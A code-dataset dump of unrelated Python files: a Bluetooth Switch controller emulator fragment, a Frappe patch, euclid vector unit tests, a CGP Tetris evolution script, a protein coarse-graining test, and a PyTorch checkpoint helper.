            self.input.current_macro_commands = "JCR_SL JCR_SR 0.0s".strip(" ").split(" ")
        if self.lock:
            self.lock.acquire()
        try:
            itr, ctrl = self.connect()
        finally:
            if self.lock:
                self.lock.release()
        self.state["state"] = "connected"
        self.switch_address = itr.getsockname()[0]
        return itr, ctrl

    def connect(self):
        """Configures as a specified controller, pairs with a Nintendo Switch,
        and creates/accepts sockets for communication with the Switch.

        :returns: (interrupt, control) sockets for the paired Switch
        """
        self.state["state"] = "connecting"
        # Creating control and interrupt sockets
        s_ctrl = socket.socket(
            family=socket.AF_BLUETOOTH,
            type=socket.SOCK_SEQPACKET,
            proto=socket.BTPROTO_L2CAP)
        s_itr = socket.socket(
            family=socket.AF_BLUETOOTH,
            type=socket.SOCK_SEQPACKET,
            proto=socket.BTPROTO_L2CAP)
        # Setting up HID interrupt/control sockets
        try:
            s_ctrl.bind((self.bt.address, 17))
            s_itr.bind((self.bt.address, 19))
        except OSError:
            s_ctrl.bind((socket.BDADDR_ANY, 17))
            s_itr.bind((socket.BDADDR_ANY, 19))
        s_itr.listen(1)
        s_ctrl.listen(1)
        self.bt.set_discoverable(True)
        ctrl, ctrl_address = s_ctrl.accept()
        itr, itr_address = s_itr.accept()
        # Send an empty input report to the Switch to prompt a reply
        self.protocol.process_commands(None)
        msg = self.protocol.get_report()
        itr.sendall(msg)
        # Setting interrupt connection as non-blocking.
        # In this case, non-blocking means it throws a "BlockingIOError"
        # for sending and receiving, instead of blocking.
        fcntl.fcntl(itr, fcntl.F_SETFL, os.O_NONBLOCK)
        # Mainloop
        while True:
            # Attempt to get output from Switch
            try:
                reply = itr.recv(50)
                if self.logger_level <= logging.DEBUG and len(reply) > 40:
                    self.logger.debug(format_msg_switch(reply))
            except BlockingIOError:
                reply = None
            self.protocol.process_commands(reply)
            msg = self.protocol.get_report()
            if self.logger_level <= logging.DEBUG and reply:
                self.logger.debug(format_msg_controller(msg))
            try:
                itr.sendall(msg)
            except BlockingIOError:
                continue
            # Exit pairing loop when player lights have been set and
            # vibration has been enabled
            if (reply and len(reply) > 45 and
                    self.protocol.vibration_enabled and self.protocol.player_number):
                break
            # Switch responds to packets slower during pairing
            # Pairing cycle responds optimally on a 15Hz loop
            time.sleep(1/15)
        self.slow_input_frequency = True
        self.input.exited_grip_order_menu = False
        return itr, ctrl

    def reconnect(self, reconnect_address):
        """Attempts to reconnect with a Switch at the given address.

        :param reconnect_address: The Bluetooth MAC address of the Switch
        :type reconnect_address: string or list
        :returns: (interrupt, control) sockets
        :raises OSError: when no address can be connected to
        """
        def recreate_sockets():
            # Creating control and interrupt sockets
            ctrl = socket.socket(
                family=socket.AF_BLUETOOTH,
                type=socket.SOCK_SEQPACKET,
                proto=socket.BTPROTO_L2CAP)
            itr = socket.socket(
                family=socket.AF_BLUETOOTH,
                type=socket.SOCK_SEQPACKET,
                proto=socket.BTPROTO_L2CAP)
            return itr, ctrl
        self.state["state"] = "reconnecting"
        itr = None
        ctrl = None
        if type(reconnect_address) == list:
            # Try each candidate address until one accepts both channels
            for address in reconnect_address:
                test_itr, test_ctrl = recreate_sockets()
                try:
                    # Setting up HID interrupt/control sockets
                    test_ctrl.connect((address, 17))
                    test_itr.connect((address, 19))
                    itr = test_itr
                    ctrl = test_ctrl
                except OSError:
                    test_itr.close()
                    test_ctrl.close()
                    pass
        elif type(reconnect_address) == str:
            test_itr, test_ctrl = recreate_sockets()
            # Setting up HID interrupt/control sockets
            test_ctrl.connect((reconnect_address, 17))
            test_itr.connect((reconnect_address, 19))
            itr = test_itr
            ctrl = test_ctrl
        if not itr and not ctrl:
            raise OSError("Unable to reconnect to sockets at the given address(es)",
                          reconnect_address)
        fcntl.fcntl(itr, fcntl.F_SETFL, os.O_NONBLOCK)
        # Send an empty input report to the Switch to prompt a reply
        self.protocol.process_commands(None)
        msg = self.protocol.get_report()
        itr.sendall(msg)
        # Setting interrupt connection as non-blocking
        # In this case, non-blocking means it throws a "BlockingIOError"
        # for sending and receiving, instead of blocking
        fcntl.fcntl(itr, fcntl.F_SETFL, os.O_NONBLOCK)
        return itr, ctrl
| 34.415789 | 90 | 0.558878 |
3adefdd3fa592b7c580b21e49f739074251c1d6b | 391 | py | Python | mfi_customization/mfi/patch/set_first_responded_on_issue.py | anuradha-88/mfi_customization | eb19ed43d0178b461f1d9914d2f7b6b55c9d030c | [
"MIT"
] | null | null | null | mfi_customization/mfi/patch/set_first_responded_on_issue.py | anuradha-88/mfi_customization | eb19ed43d0178b461f1d9914d2f7b6b55c9d030c | [
"MIT"
] | null | null | null | mfi_customization/mfi/patch/set_first_responded_on_issue.py | anuradha-88/mfi_customization | eb19ed43d0178b461f1d9914d2f7b6b55c9d030c | [
"MIT"
] | null | null | null | import frappe
from datetime import datetime
# bench execute mfi_customization.mfi.patch.set_first_responded_on_issue.execute
def execute():
for d in frappe.get_all("Issue"):
for tk in frappe.get_all("Task",{"issue": d.name}, ['attended_date_time', 'status']):
if tk.attended_date_time:
frappe.db.set_value("Issue", {"name": d.name},"first_responded_on",tk.attended_date_time)
| 35.545455 | 93 | 0.749361 |
3adf36991cec5979dbe14a96fcb6614f4fd9f191 | 12,144 | py | Python | team_9/cocos/utest/test_euclid.py | Donnyvdm/dojo19 | 3cf043a84e3ad6d3c4d59cd9c50b160e1ff03400 | [
"BSD-3-Clause"
] | 1 | 2019-09-15T18:59:49.000Z | 2019-09-15T18:59:49.000Z | team_9/cocos/utest/test_euclid.py | Donnyvdm/dojo19 | 3cf043a84e3ad6d3c4d59cd9c50b160e1ff03400 | [
"BSD-3-Clause"
] | null | null | null | team_9/cocos/utest/test_euclid.py | Donnyvdm/dojo19 | 3cf043a84e3ad6d3c4d59cd9c50b160e1ff03400 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import division, print_function, unicode_literals
import cocos.euclid as eu
import unittest
import copy
try:
import cPickle as pickle
except Exception:
import pickle
import io
class Test_Vector2(unittest.TestCase):
def test_instantiate(self):
xy = (1.0, 2.0)
v2 = eu.Vector2(*xy)
self.assertEqual(repr(v2), "Vector2(%.2f, %.2f)" % xy)
def test_instantiate_default(self):
v2 = eu.Vector2()
self.assertEqual(repr(v2), "Vector2(%.2f, %.2f)" % (0, 0))
def test_copy(self):
xy = (1.0, 2.0)
v2 = eu.Vector2(*xy)
copied = v2.__copy__()
self.assertEqual(repr(v2), repr(copied))
self.assertFalse(copied is v2)
def test_deepcopy(self):
xy = (1.0, 2.0)
v2 = eu.Vector2(*xy)
copied = copy.deepcopy(v2)
self.assertEqual(repr(v2), repr(copied))
self.assertFalse(copied is v2)
self.assertFalse(hasattr(copied, '__dict__'))
# they need __getstate__ and __setstate__ implemented
def test_pickle_lower_protocols(self):
xy = (1.0, 2.0)
v2 = eu.Vector2(*xy)
s = pickle.dumps(v2, 0)
copied = pickle.loads(s)
self.assertEqual(repr(v2), repr(copied))
self.assertFalse(copied is v2)
self.assertFalse(hasattr(copied, '__dict__'))
s = pickle.dumps(v2, 1)
copied = pickle.loads(s)
self.assertEqual(repr(v2), repr(copied))
self.assertFalse(copied is v2)
self.assertFalse(hasattr(copied, '__dict__'))
# don't need __getstate__ / __setstate__ implemented
def test_pickle_protocol_2(self):
xy = (1.0, 2.0)
v2 = eu.Vector2(*xy)
s = pickle.dumps(v2, 2)
copied = pickle.loads(s)
self.assertEqual(repr(v2), repr(copied))
self.assertFalse(copied is v2)
self.assertFalse(hasattr(copied, '__dict__'))
def test_eq_v2(self):
xy = (1.0, 2.0)
self.assertTrue(eu.Vector2(*xy), eu.Vector2(*xy))
other = (1.0, 3.0)
self.assertTrue( eu.Vector2(*xy) != eu.Vector2(*other))
def test_eq_tuple(self):
xy = (1.0, 2.0)
self.assertEqual(eu.Vector2(*xy), xy)
other = (1.0, 2.0, 3.0)
self.assertRaises( AssertionError,
lambda a, b: a == b, eu.Vector2(*xy), other)
other = 1.0
self.assertRaises( AssertionError,
lambda a, b: a == b, eu.Vector2(*xy), other)
def test_len(self):
xy = (1.0, 2.0)
self.assertEqual(len(eu.Vector2(*xy)), 2)
def test_index_access__get(self):
xy = (1.0, 2.0)
v2 = eu.Vector2(*xy)
self.assertEqual( v2[0], xy[0])
self.assertEqual(v2[1], xy[1])
self.assertRaises(IndexError,
lambda a: v2[a], 2)
def test_index_access__set(self):
xy = (1.0, 2.0)
v2 = eu.Vector2(*xy)
v2[0] = 7.0
self.assertEqual(repr(v2), "Vector2(%.2f, %.2f)" % (7.0, 2.0))
v2[1] = 8.0
self.assertEqual(repr(v2), "Vector2(%.2f, %.2f)" % (7.0, 8.0))
def f():
v2[2] = 9.0
self.assertRaises(IndexError, f)
def test_iter(self):
xy = [1.0, 2.0]
v2 = eu.Vector2(*xy)
sequence = [e for e in v2]
self.assertEqual(sequence, xy)
def test_swizzle_get(self):
    """Swizzle attributes expose the components in any requested order."""
    xy = (1.0, 2.0)
    v2 = eu.Vector2(*xy)
    self.assertEqual(v2.x, xy[0])
    self.assertEqual(v2.y, xy[1])
    self.assertEqual(v2.xy, xy)
    self.assertEqual(v2.yx, (xy[1], xy[0]))
    # Idiom fix: assertRaises replaces the manual try/except/isinstance
    # bookkeeping while checking exactly the same contract.
    self.assertRaises(AttributeError, getattr, v2, 'z')
def test_sub__v2_v2(self):
    """Vector2 - Vector2 subtracts componentwise."""
    minuend = eu.Vector2(3.0, 7.0)
    subtrahend = eu.Vector2(1.0, 2.0)
    self.assertEqual(minuend - subtrahend, eu.Vector2(2.0, 5.0))
def test_sub__v2_t2(self):
    """Vector2 - tuple subtracts componentwise."""
    # Cleanup: the unused Vector2 built from `b` was dead code.
    va = eu.Vector2(3.0, 7.0)
    self.assertEqual(va - (1.0, 2.0), eu.Vector2(2.0, 5.0))
def test_rsub__t2_v2(self):
    """tuple - Vector2 (reflected subtraction) subtracts componentwise."""
    # Cleanup: the unused Vector2 built from `a` was dead code.
    vb = eu.Vector2(1.0, 2.0)
    self.assertEqual((3.0, 7.0) - vb, eu.Vector2(2.0, 5.0))
# in py3 or py2 with 'from __future__ import division'
# else the integer division is used, as in old euclid.py
def test_default_div(self):
    """'/' performs true division on integer components."""
    v2 = eu.Vector2(4, 7)
    c = v2 / 3
    # Bug fix: assertTrue(cond, msg) used the second comparison as the
    # failure message, so c.y was never actually checked.
    self.assertEqual(c.x, 4.0 / 3)
    self.assertEqual(c.y, 7.0 / 3)
def test_integer_division(self):
    """'//' floor-divides each component."""
    v2 = eu.Vector2(4, 7)
    c = v2 // 3
    # Bug fix: assertTrue(cond, msg) silently ignored the c.y comparison.
    self.assertEqual(c.x, 4 // 3)
    self.assertEqual(c.y, 7 // 3)
def test_add(self):
    """'+' mixes Vector2/Point2/tuple operands with the expected result types."""
    va = eu.Vector2(3.0, 7.0)
    vb = eu.Vector2(1.0, 2.0)
    self.assertTrue(isinstance(va + vb, eu.Vector2))
    self.assertEqual(repr(va + vb), 'Vector2(%.2f, %.2f)' % (4.0, 9.0))
    pc = eu.Point2(11.0, 17.0)
    pd = eu.Point2(13.0, 23.0)
    # vector + point -> point, while point + point -> vector
    self.assertTrue(isinstance(va + pc, eu.Point2))
    self.assertTrue(isinstance(pc + pd, eu.Vector2))
    b = (1.0, 2.0)
    self.assertTrue(isinstance(va + b, eu.Vector2))
    self.assertEqual(va + vb, va + b)
def test_inplace_add(self):
    """'+=' accepts both a tuple and a Vector2 on the right-hand side."""
    a = (3.0, 7.0)
    b = (1.0, 2.0)
    va = eu.Vector2(*a)
    va += b
    self.assertEqual((va.x, va.y), (4.0, 9.0))
    # Bug fix: the second half repeated `va += b`; it was clearly meant to
    # exercise a Vector2 right-hand side as well.
    va = eu.Vector2(*a)
    va += eu.Vector2(*b)
    self.assertEqual((va.x, va.y), (4.0, 9.0))
class Test_Vector3(unittest.TestCase):
    """Behavioural tests for eu.Vector3 (mirrors Test_Vector2)."""

    def test_instantiate(self):
        xyz = (1.0, 2.0, 3.0)
        v3 = eu.Vector3(*xyz)
        self.assertEqual(repr(v3), "Vector3(%.2f, %.2f, %.2f)" % xyz)

    def test_instantiate_default(self):
        v3 = eu.Vector3()
        self.assertEqual(repr(v3), "Vector3(%.2f, %.2f, %.2f)" % (0, 0, 0))

    def test_copy(self):
        v3 = eu.Vector3(1.0, 2.0, 3.0)
        copied = v3.__copy__()
        self.assertEqual(repr(v3), repr(copied))
        self.assertFalse(copied is v3)

    def test_deepcopy(self):
        v3 = eu.Vector3(1.0, 2.0, 3.0)
        copied = copy.deepcopy(v3)
        self.assertEqual(repr(v3), repr(copied))
        self.assertFalse(copied is v3)

    # protocols 0 and 1 need __getstate__ and __setstate__ implemented
    def test_pickle_lower_protocols(self):
        v3 = eu.Vector3(1.0, 2.0, 3.0)
        for protocol in (0, 1):
            restored = pickle.loads(pickle.dumps(v3, protocol))
            self.assertEqual(repr(v3), repr(restored))
            self.assertFalse(restored is v3)
            self.assertFalse(hasattr(restored, '__dict__'))

    # protocol 2 works without __getstate__ / __setstate__
    def test_pickle_protocol_2(self):
        v3 = eu.Vector3(1.0, 2.0, 3.0)
        restored = pickle.loads(pickle.dumps(v3, 2))
        self.assertEqual(repr(v3), repr(restored))
        self.assertFalse(restored is v3)

    def test_eq_v3(self):
        xyz = (1.0, 2.0, 3.0)
        # Bug fix: assertTrue(a, b) never compared the two vectors.
        self.assertEqual(eu.Vector3(*xyz), eu.Vector3(*xyz))
        other = (1.0, 3.0, 7.0)
        self.assertTrue(eu.Vector3(*xyz) != eu.Vector3(*other))

    def test_eq_tuple(self):
        xyz = (1.0, 2.0, 3.0)
        self.assertEqual(eu.Vector3(*xyz), xyz)
        # A wrong-sized tuple or a scalar triggers euclid's internal assert.
        for bad in ((1.0, 2.0, 3.0, 4.0), 1.0):
            self.assertRaises(AssertionError, lambda a, b: a == b,
                              eu.Vector3(*xyz), bad)

    def test_len(self):
        self.assertEqual(len(eu.Vector3(1.0, 2.0, 3.0)), 3)

    def test_index_access__get(self):
        xyz = (1.0, 2.0, 3.0)
        v3 = eu.Vector3(*xyz)
        for i, expected in enumerate(xyz):
            self.assertEqual(v3[i], expected)
        self.assertRaises(IndexError, lambda i: v3[i], 3)

    def test_index_access__set(self):
        v3 = eu.Vector3(1.0, 2.0, 3.0)
        v3[0] = 7.0
        self.assertEqual(repr(v3), "Vector3(%.2f, %.2f, %.2f)" % (7.0, 2.0, 3.0))
        v3[1] = 8.0
        self.assertEqual(repr(v3), "Vector3(%.2f, %.2f, %.2f)" % (7.0, 8.0, 3.0))
        v3[2] = 9.0
        self.assertEqual(repr(v3), "Vector3(%.2f, %.2f, %.2f)" % (7.0, 8.0, 9.0))
        def assign_out_of_range():
            v3[3] = 9.0
        self.assertRaises(IndexError, assign_out_of_range)

    def test_iter(self):
        xyz = [1.0, 2.0, 3.0]
        self.assertEqual(list(eu.Vector3(*xyz)), xyz)

    def test_swizzle_get(self):
        xyz = (1.0, 2.0, 3.0)
        v3 = eu.Vector3(*xyz)
        self.assertEqual(v3.x, xyz[0])
        self.assertEqual(v3.y, xyz[1])
        self.assertEqual(v3.z, xyz[2])
        # Every two- and three-component swizzle permutation.
        for name in ('xy', 'xz', 'yz', 'yx', 'zx', 'zy',
                     'xyz', 'xzy', 'zyx', 'zxy', 'yxz', 'yzx'):
            expected = tuple(xyz['xyz'.index(c)] for c in name)
            self.assertEqual(getattr(v3, name), expected)
        # Idiom fix: assertRaises replaces the manual try/except bookkeeping.
        self.assertRaises(AttributeError, getattr, v3, 'u')

    def test_sub__v3_v3(self):
        va = eu.Vector3(3.0, 7.0, 9.0)
        vb = eu.Vector3(1.0, 2.0, 3.0)
        self.assertEqual(va - vb, eu.Vector3(2.0, 5.0, 6.0))

    def test_sub__v3_t3(self):
        # Cleanup: the unused Vector3 built from `b` was dead code.
        va = eu.Vector3(3.0, 7.0, 9.0)
        self.assertEqual(va - (1.0, 2.0, 3.0), eu.Vector3(2.0, 5.0, 6.0))

    def test_rsub__t3_v3(self):
        # Cleanup: the unused Vector3 built from `a` was dead code.
        vb = eu.Vector3(1.0, 2.0, 3.0)
        self.assertEqual((3.0, 7.0, 9.0) - vb, eu.Vector3(2.0, 5.0, 6.0))
class Test_Point2(unittest.TestCase):
    """Point2 shares Vector2's swizzle behaviour."""

    def test_swizzle_get(self):
        xy = (1.0, 2.0)
        p2 = eu.Point2(*xy)
        self.assertEqual(p2.x, xy[0])
        self.assertEqual(p2.y, xy[1])
        self.assertEqual(p2.xy, xy)
        self.assertEqual(p2.yx, (xy[1], xy[0]))
        # Idiom fix: assertRaises replaces the manual try/except bookkeeping.
        self.assertRaises(AttributeError, getattr, p2, 'z')
class Test_Point3(unittest.TestCase):
    """Point3 shares Vector3's swizzle behaviour."""

    def test_swizzle_get(self):
        xyz = (1.0, 2.0, 3.0)
        p3 = eu.Point3(*xyz)
        self.assertEqual(p3.x, xyz[0])
        self.assertEqual(p3.y, xyz[1])
        self.assertEqual(p3.z, xyz[2])
        # Every two- and three-component swizzle permutation (consistent
        # with Test_Vector3.test_swizzle_get).
        for name in ('xy', 'xz', 'yz', 'yx', 'zx', 'zy',
                     'xyz', 'xzy', 'zyx', 'zxy', 'yxz', 'yzx'):
            expected = tuple(xyz['xyz'.index(c)] for c in name)
            self.assertEqual(getattr(p3, name), expected)
# Allow running this test module directly: discover and run all TestCases.
if __name__ == '__main__':
    unittest.main()
| 30.512563 | 81 | 0.525115 |
3adf530cc79f1ef10e5ff6f32271340c43c7203b | 3,769 | py | Python | main.py | aHeraud/cgp-tetris | a3483b279bf0bc53edcb3a871873dd576a33c01c | [
"MIT"
] | null | null | null | main.py | aHeraud/cgp-tetris | a3483b279bf0bc53edcb3a871873dd576a33c01c | [
"MIT"
] | null | null | null | main.py | aHeraud/cgp-tetris | a3483b279bf0bc53edcb3a871873dd576a33c01c | [
"MIT"
] | null | null | null | #!/usr/local/bin/python3
import sys
from multiprocessing import Pool
from timeit import default_timer as timer
from config import Config
from cgp.functionset import FunctionSet
from cgp.genome import Genome
import numpy as np
import numpy.random
from random import randint
from tetris_learning_environment import Environment
from tetris_learning_environment import Key
import tetris_learning_environment.gym as gym
from cgp import functional_graph
import signal
import time
FRAME_SKIP = 120
DOWNSAMPLE = 8
PROCESSES = 3
CONFIG = Config()
FUNCTION_SET = FunctionSet()
def worker_init(rom_path):
    """Pool initializer: give each worker process its own emulator.

    The environment is stored in a module-level global so run_episode,
    executed inside the same worker, can reach it.
    """
    global env
    env = gym.TetrisEnvironment(rom_path, frame_skip=FRAME_SKIP)
def run_episode(genome):
    """Play one Tetris episode with `genome`; return (genome, total reward).

    Uses the per-process global `env` created by worker_init. The +1 added
    per step is presumably a survival bonus rewarding genomes that stay
    alive longer -- TODO confirm.
    """
    pixels = env.reset()
    done = False
    reward_sum = 0
    while not done:
        # Collapse RGB to a single grayscale channel constrained to [0, 1].
        grayscale = np.sum(pixels, axis=2) / 3.0 / 255.0
        output = genome.evaluate(grayscale)
        action = np.argmax(output)
        pixels, reward, done, info = env.step(action)
        reward_sum += reward + 1
    return (genome, reward_sum)
def render(env, genome):
    """Visualise one episode of `genome` playing in `env` via pygame.

    NOTE(review): this feeds genome.evaluate three downsampled colour
    channels, while run_episode feeds a single full-resolution grayscale
    array -- confirm which input layout the genome actually expects.
    """
    pixels = env.reset()
    import pygame
    pygame.init()
    # Frame buffer is (height, width, 3); pygame wants (width, height).
    size = (pixels.shape[1], pixels.shape[0])
    display = pygame.display.set_mode(size)
    pygame.display.set_caption('Tetris')
    carryOn = True
    clock = pygame.time.Clock()
    done = False
    while not done and carryOn:
        for event in pygame.event.get():  # User did something
            if event.type == pygame.QUIT:  # If user clicked close
                carryOn = False
        # Rotate/flip so the array orientation matches the display surface.
        pygame.surfarray.blit_array(display, np.flip(np.rot90(pixels), axis=0))
        pygame.display.flip()
        rPixels = pixels[::DOWNSAMPLE, ::DOWNSAMPLE, 0] / 255.0
        gPixels = pixels[::DOWNSAMPLE, ::DOWNSAMPLE, 1] / 255.0
        bPixels = pixels[::DOWNSAMPLE, ::DOWNSAMPLE, 2] / 255.0
        output = genome.evaluate(rPixels, gPixels, bPixels)
        action = np.argmax(output)
        pixels, reward, done, info = env.step(action)
        clock.tick(60)  # cap the preview at 60 FPS
    pygame.quit()
def main():
    """Entry point: evolve CGP genomes to play Tetris, then replay the best.

    Runs a (1 + lambda) evolution loop: each generation spawns children of
    the current elite, evaluates them in a process pool, and keeps the
    highest-scoring genome.
    """
    if len(sys.argv) < 2:
        print("Missing rom path argument.")
        return
    tetris_rom_path = sys.argv[1]
    bestScore = 0
    # Global so the replay loop below (and debugging) can reach the champion.
    global elite
    elite = Genome(CONFIG, FUNCTION_SET)
    print('Starting CGP for ' + str(CONFIG.generations) + ' generations...')
    with Pool(processes=PROCESSES, initializer=worker_init, initargs=(tetris_rom_path,)) as pool:
        for generation in range(CONFIG.generations):
            start = timer()
            children = [elite.get_child() for _ in range(CONFIG.childrenPerGeneration)]
            results = [pool.apply_async(run_episode, args=(child,)) for child in children]
            results = [result.get() for result in results]
            for (genome, score) in results:
                # '>=' (not '>') lets an equal-scoring child replace the
                # elite, which keeps neutral drift alive.
                if score >= bestScore:
                    bestScore = score
                    elite = genome
                    elite.save_to_file('elite.out')
            end = timer()
            timeElapsed = end - start
            # Rough ETA: assume every remaining generation costs as much
            # as this one did.
            estimatedTimeSec = timeElapsed * (CONFIG.generations + 1 - generation)
            estimatedTimeMin = estimatedTimeSec / 60.0
            print('Generation ' + str(generation + 1) + ' of ' + str(CONFIG.generations) + ' complete, current best score = ', bestScore)
            print('Est. minutes remaining: ' + str(estimatedTimeMin))
    print("FINISHED")
    print('Best Score: ', bestScore)
    env = gym.TetrisEnvironment(tetris_rom_path, frame_skip=FRAME_SKIP)
    # Replay the champion forever until the window is closed.
    while True:
        render(env, elite)
# Script entry point.
if __name__ == '__main__':
    main()
| 30.395161 | 137 | 0.644733 |
3ae00d3abfc861f7559fd9d0fd444be28cadc9c5 | 3,175 | py | Python | test/molecular_map_test/single_protein_explicit_mapping/test_single_protein_explicit_mapping.py | fieryd/cgmap | 8b09cf1392d22be4f735d3259ee9d624f3e45210 | [
"Apache-2.0"
] | 5 | 2018-03-05T07:10:09.000Z | 2019-09-11T19:33:56.000Z | test/molecular_map_test/single_protein_explicit_mapping/test_single_protein_explicit_mapping.py | fieryd/cgmap | 8b09cf1392d22be4f735d3259ee9d624f3e45210 | [
"Apache-2.0"
] | 3 | 2017-05-02T21:47:38.000Z | 2020-07-16T20:12:19.000Z | test/molecular_map_test/single_protein_explicit_mapping/test_single_protein_explicit_mapping.py | fieryd/cgmap | 8b09cf1392d22be4f735d3259ee9d624f3e45210 | [
"Apache-2.0"
] | 4 | 2017-09-18T20:02:33.000Z | 2021-11-01T15:51:51.000Z | #!/usr/bin/env python2
import sys
sys.path.append('../../../src/')
import cgmap as cg
import mdtraj as md
import md_check as check
############################### config #####################################
# Input, output and reference artifacts share the same file names; only the
# directory distinguishes them.
input_traj = "protein.trr"
input_top = "protein.pdb"
output_traj = "protein.trr"
output_top = "protein.pdb"
reference_traj = "protein.trr"
reference_top = "protein.pdb"
output_dir = './output/'
input_dir = './input/'
reference_dir = './reference/'
############################### run ########################################
### pull in trajectories
trj = md.load(input_dir + input_traj, top=input_dir + input_top)

### define mapping based on knowledge of topology
### in this instance, map every residue into a single site
# mdtraj does not populate masses/charges by default; the center-of-mass
# mapping below needs them.
for a in trj.top.atoms: a.mass = a.element.mass
for a in trj.top.atoms: a.charge = 0

# first residue is SER148 (zero index'd)
name_lists = []        # per-molecule lists of atom-selection strings
label_lists = []       # per-molecule lists of CG bead labels (residue names)
molecule_types = []    # molecule-type id for each molecule found
resREF = 148           # residue number currently being accumulated
istart = 0             # first atom index of the current residue
iend = 0
iname = "SER"
molnum = 0             # running molecule counter
maxSize = len(list(trj.top.atoms))
stopFlag = False       # NOTE(review): only set in commented-out code below
tempMol = []
tempCGL = []
name_lists_key = []    # distinct residue names seen (not used downstream)
for i, a in enumerate(trj.top.atoms):
    # residue string looks like 'SER148': name in [0:3], number in [3:6]
    resNAME = str(a.residue)[0:3]
    resNUM = int(str(a.residue)[3:6])
    aINDEX = a.index
    if resNAME not in name_lists_key:
        name_lists_key.append(resNAME)
    if (resNUM != resREF):
        # Crossed a residue boundary: close out the previous residue.
        # first append name_lists and label
        iend = aINDEX - 1
        tempMol.append("index %d to %d" % (istart, iend))
        tempCGL.append(iname)
        # then update things for next residue
        iname = resNAME
        istart = aINDEX
        if resNUM < resREF:
            # Residue number decreased: a new molecule (chain) started.
            #stopFlag = True
            molecule_types.append(int(molnum))
            name_lists.append(tempMol)
            label_lists.append(tempCGL)
            tempMol = []
            tempCGL = []
            molnum += 1
        resREF = resNUM
    # special case if last item
    if (i == (maxSize - 1)):
        iend = aINDEX
        tempMol.append("index %d to %d" % (istart, iend))
        tempCGL.append(iname)
        molecule_types.append(int(molnum))
        name_lists.append(tempMol)
        label_lists.append(tempCGL)

#actual map command
print name_lists
print label_lists
print molecule_types
print "Lengths of all three lists should be equivalent: %d = %d = %d" % (len(name_lists), len(label_lists), len(molecule_types))
cg_trj = cg.map_unfiltered_molecules(trj=trj,
                                     selection_list=name_lists,
                                     bead_label_list=label_lists,
                                     molecule_types=molecule_types,
                                     mapping_function="com")
cg_trj.save(output_dir + output_traj)
cg_trj[0].save(output_dir + output_top)
############################### check results ###############################
# reloading results from disk.
cg_traj = cg_trj.load(output_dir + output_traj, top=output_dir + output_top)
ref_cg_traj = cg_trj.load(reference_dir + reference_traj,
                          top=reference_dir + reference_top)
# Compare the freshly mapped trajectory against the stored reference; the
# process exit status reflects the outcome so CI can consume it.
result = check.md_content_equality(cg_traj, ref_cg_traj)
sys.exit(check.check_result_to_exitval(result))
| 28.097345 | 128 | 0.589606 |
3ae33afc12f8987d0c85ee05a95ac1ec3a4be0c6 | 3,726 | py | Python | image_classifier/model_lib.py | JMarcan/computer_vision_perception | a5aa7bfb316e7b45596d8c5916638f5ce2b6d654 | [
"MIT"
] | null | null | null | image_classifier/model_lib.py | JMarcan/computer_vision_perception | a5aa7bfb316e7b45596d8c5916638f5ce2b6d654 | [
"MIT"
] | null | null | null | image_classifier/model_lib.py | JMarcan/computer_vision_perception | a5aa7bfb316e7b45596d8c5916638f5ce2b6d654 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Function that loads a checkpoint and rebuilds the model
import torch
from torch import nn
from collections import OrderedDict
from torchvision import datasets, transforms, models
def save_checkpoint(model, checkpoint_path, output_categories, arch='vgg16'):
    '''
    Save the trained deep learning model

    Args:
        model: trained deep learning model to be saved
        checkpoint_path(str): file path where model will be saved
        output_categories(int): number of output categories recognized by the model
        arch(str): torchvision architecture name ('vgg16' or 'vgg13');
            defaults to 'vgg16' for backward compatibility
    Returns:
        None
    '''
    # Move to CPU so the checkpoint loads on machines without a GPU.
    model.cpu()
    # Generalization: the architecture used to be hard-coded to 'vgg16'
    # even though load_checkpoint also supports 'vgg13'.
    torch.save({'arch': arch,
                'state_dict': model.state_dict(),
                'class_to_idx': model.class_to_idx,
                'output_categories': output_categories
                }, checkpoint_path)
def load_checkpoint(checkpoint_path, device='cuda'):
    '''
    Loads trained deep learning model

    Args:
        checkpoint_path(str): file path the model is loaded from
        device(str): map_location passed to torch.load ('cuda' or 'cpu')
    Returns:
        model: loaded deep learning model, or 0 on any validation failure
            (NOTE(review): consider raising an exception instead of
            returning 0, so callers cannot silently use the sentinel)
    '''
    check = torch.load(checkpoint_path, map_location=device)
    # Rebuild the pretrained backbone matching the saved architecture.
    if check['arch'] == 'vgg16':
        model = models.vgg16(pretrained=True)
    elif check['arch'] == 'vgg13':
        model = models.vgg13(pretrained=True)
    else:
        print("Error: LoadCheckpoint - Model not recognized")
        return 0
    output_categories = 2
    try:
        if check['output_categories'] >= 2:
            output_categories = check['output_categories']
        else:
            print("Error: LoadCheckpoint - Saved model output categories has invalid value ({0}). Value needs to be 2 or higher.".format(check['output_categories']))
            return 0
    except Exception as e:  # when ['output_categories'] is not part of the saved model
        print("Error: LoadCheckpoint - Saved model does not contain information about output categories: {0}".format(e))
        return 0
    # Freeze the convolutional features; only the classifier is trainable.
    for param in model.parameters():
        param.requires_grad = False
    model.class_to_idx = check['class_to_idx']
    model.classifier = load_classifier(model, output_categories)
    model.load_state_dict(check['state_dict'])
    return model
def load_classifier(model, output_categories):
    '''
    Build the trainable classifier head for a VGG-style model.

    Args:
        model: deep learning model whose classifier is being replaced;
            only model.classifier[0].in_features is read (25088 for VGG16)
        output_categories(int): number of output categories
    Returns:
        classifier: nn.Sequential head producing log-probabilities
    '''
    # Mirror VGG's classifier dimensions: input width comes from the first
    # Linear layer of the existing (pretrained) classifier.
    in_features = model.classifier[0].in_features
    hidden_units = 4096  # default VGG hidden width

    # LogSoftmax yields log-probabilities whose exponentials sum to 1,
    # i.e. per-class confidences between 0 and 100%.
    return nn.Sequential(
        nn.Linear(in_features, hidden_units, bias=True),
        nn.ReLU(),
        nn.Dropout(p=0.5),
        nn.Linear(hidden_units, output_categories),
        nn.LogSoftmax(dim=1),
    )
| 31.846154 | 165 | 0.630972 |
3ae4b2634727a7a3c18f2473fe0c51212182326b | 7,689 | py | Python | pytorch/utils/utils.py | XinyiYS/CollaborativeFairFederatedLearning | 1372f74230b366a41243f809ce0fc15586cd40fe | [
"MIT"
] | 25 | 2020-07-29T03:46:12.000Z | 2022-03-23T07:15:53.000Z | pytorch/utils/utils.py | lingjuanlv/CollaborativeFairFederatedLearning | 1372f74230b366a41243f809ce0fc15586cd40fe | [
"MIT"
] | null | null | null | pytorch/utils/utils.py | lingjuanlv/CollaborativeFairFederatedLearning | 1372f74230b366a41243f809ce0fc15586cd40fe | [
"MIT"
